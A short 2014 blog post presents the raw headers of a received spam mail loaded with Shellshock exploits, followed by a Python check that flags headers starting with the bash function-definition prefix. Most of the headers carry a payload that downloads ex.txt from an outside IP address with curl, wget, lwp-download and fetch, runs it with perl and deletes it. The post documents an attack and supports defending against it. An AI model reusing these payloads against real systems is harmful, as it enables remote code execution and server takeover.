
Shellshock mail

Posted Fri 24 Oct 2014 08:41:52 PM CEST

Now this is interesting: a mail arrived here full of Shellshock exploits. Apparently this seems to work in one place or another.

Received: from pax.zz.de ([127.0.0.1])
        by localhost (pax.zz.de [127.0.0.1]) (amavisd-new, port 10024)
        with ESMTP id HiReUx0cpQN1 for <flo+admin@pax.zz.de>;
        Fri, 24 Oct 2014 18:43:08 +0200 (CEST)
Received: from plug.rfc822.org (plug.rfc822.org [195.71.68.84])
        by pax.zz.de (Postfix) with ESMTP id 28353D009E
        for <flo+admin@rfc822.org>; Fri, 24 Oct 2014 18:43:07 +0200 (CEST)
Received: by plug.rfc822.org (Postfix)
        id C2642F95D; Fri, 24 Oct 2014 18:43:07 +0200 (CEST)
Delivered-To: root@localhost
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
        by plug.rfc822.org (Postfix) with SMTP id 7821AF95A
        for <root@localhost>; Fri, 24 Oct 2014 18:43:07 +0200 (CEST)
To: () {:;};cd /tmp;curl -sO 178.254.31.165/ex.txt;lwp-download http: //178.254.31.165/ex.txt@pax.zz.de;,
        wget@pax.zz.de, 178.254.31.165/ex.txt@pax.zz.de;, fetch@pax.zz.de,
        178.254.31.165/ex.txt@pax.zz.de;, perl@pax.zz.de, ex.txt@pax.zz.de;,
        rm@pax.zz.de, -fr@pax.zz.de, ex.*@pax.zz.de;
References:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Cc: () {:;};cd /tmp;curl -sO 178.254.31.165/ex.txt;lwp-download http: //178.254.31.165/ex.txt@pax.zz.de;,
        wget@pax.zz.de, 178.254.31.165/ex.txt@pax.zz.de;, fetch@pax.zz.de,
        178.254.31.165/ex.txt@pax.zz.de;, perl@pax.zz.de, ex.txt@pax.zz.de;,
        rm@pax.zz.de, -fr@pax.zz.de, ex.*@pax.zz.de;
From: () {:;};cd /tmp;curl -sO 178.254.31.165/ex.txt;lwp-download http: //178.254.31.165/ex.txt@pax.zz.de;,
        wget@pax.zz.de, 178.254.31.165/ex.txt@pax.zz.de;, fetch@pax.zz.de,
        178.254.31.165/ex.txt@pax.zz.de;, perl@pax.zz.de, ex.txt@pax.zz.de;,
        rm@pax.zz.de, -fr@pax.zz.de, ex.*@pax.zz.de;
Subject:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Message-ID:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Comments:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Keywords:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-From: () {:;};cd /tmp;curl -sO 178.254.31.165/ex.txt;lwp-download http: //178.254.31.165/ex.txt@pax.zz.de;,
        wget@pax.zz.de, 178.254.31.165/ex.txt@pax.zz.de;, fetch@pax.zz.de,
        178.254.31.165/ex.txt@pax.zz.de;, perl@pax.zz.de, ex.txt@pax.zz.de;,
        rm@pax.zz.de, -fr@pax.zz.de, ex.*@pax.zz.de;
Resent-Message-Id: <20141024164308.F05B0D009F@pax.zz.de>
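
Added example, not part of the original post: a Python check that unfolds a message's header block and reports every header whose value begins with the `() {` function-definition prefix visible in the headers above. The sample message, its host names and the marker string are constructed for illustration.

```python
import re

# Pre-patch bash treated an environment value that begins with "() {" as a
# function definition and kept executing what followed it, so the check is
# anchored at the start of the header value.
FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")

def unfold(raw):
    """Yield (name, value) per header, joining folded continuation lines."""
    name, value = None, []
    for line in raw.splitlines():
        if not line.strip():
            break  # a blank line ends the header block
        if line[0] in " \t" and name is not None:
            value.append(line.strip())  # continuation of the previous header
            continue
        if name is not None:
            yield name, " ".join(value)
        name, _, rest = line.partition(":")
        value = [rest.strip()]
    if name is not None:
        yield name, " ".join(value)

def suspicious_headers(raw):
    """Return the names of headers whose value starts like a bash function."""
    return [name for name, value in unfold(raw) if FUNC_PREFIX.match(value)]

# Constructed sample: same shape as the mail above, harmless marker as payload.
SAMPLE = (
    "Received: from USER (host.example [192.0.2.10])\n"
    "        by mx.example (Postfix) with SMTP id CONSTRUCTED\n"
    "To: () {:;};echo constructed-marker@mx.example;,\n"
    "        more@mx.example;\n"
    "Subject:() { :; }; echo constructed-marker;\n"
    "Date: Fri, 24 Oct 2014 18:43:07 +0200\n"
    "X-Note: harmless text mentioning () { later in the value\n"
    "\n"
    "body () { :; }; not a header\n"
)

if __name__ == "__main__":
    print(suspicious_headers(SAMPLE))
```
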